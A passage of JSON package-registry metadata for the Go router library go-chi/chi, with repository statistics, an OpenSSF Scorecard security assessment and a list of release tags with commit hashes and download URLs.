ast_year_avg_time_to_close_pull_request":2561033.4146341463,"past_year_issues_closed_count":10,"past_year_pull_requests_closed_count":41,"past_year_pull_request_authors_count":52,"past_year_issue_authors_count":12,"past_year_avg_comments_per_issue":1.6153846153846154,"past_year_avg_comments_per_pull_request":0.49382716049382713,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":13,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/issues","maintainers":[{"login":"pkieltyka","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pkieltyka"},{"login":"bigwheel","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bigwheel"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Fgo-Chi%2FChi/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2263070,"maintainers_count":0,"namespaces_count":837425,"keywords_count":122443,"github":"golang","metadata":{"funded_packages_count":65362,"sync_missing_packages_cursor":{"timestamp":"2026-08-12T00:18:10.975284Z","path":"github.com/fhunleth/muontrap","version":"v0.2.1"},"rate_limit":1},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-08-12T12:33:12.528Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":4032346,"name":"gopkg.in/chi.v1","ecosystem":"go","description":"","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"gopkg.in","versions_count":1,"first_release_published_at":"2016-06-22T21:59:16.000Z","latest_release_published_at":"2016-06-22T21:59:16.000Z","latest_release_number":"v1.0.0","last_synced_at":"2026-08-12T02:06:13.784Z","created_at":"2022-04-12T09:07:54.194Z","updated_at":"2026-08-12T02:06:13.784Z","registry_url":"https://pkg.go.dev/gopkg.in/chi.v1","install_command":"go get gopkg.in/chi.v1","documentation_url":"https://pkg.go.dev/gopkg.in/chi.v1#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/ch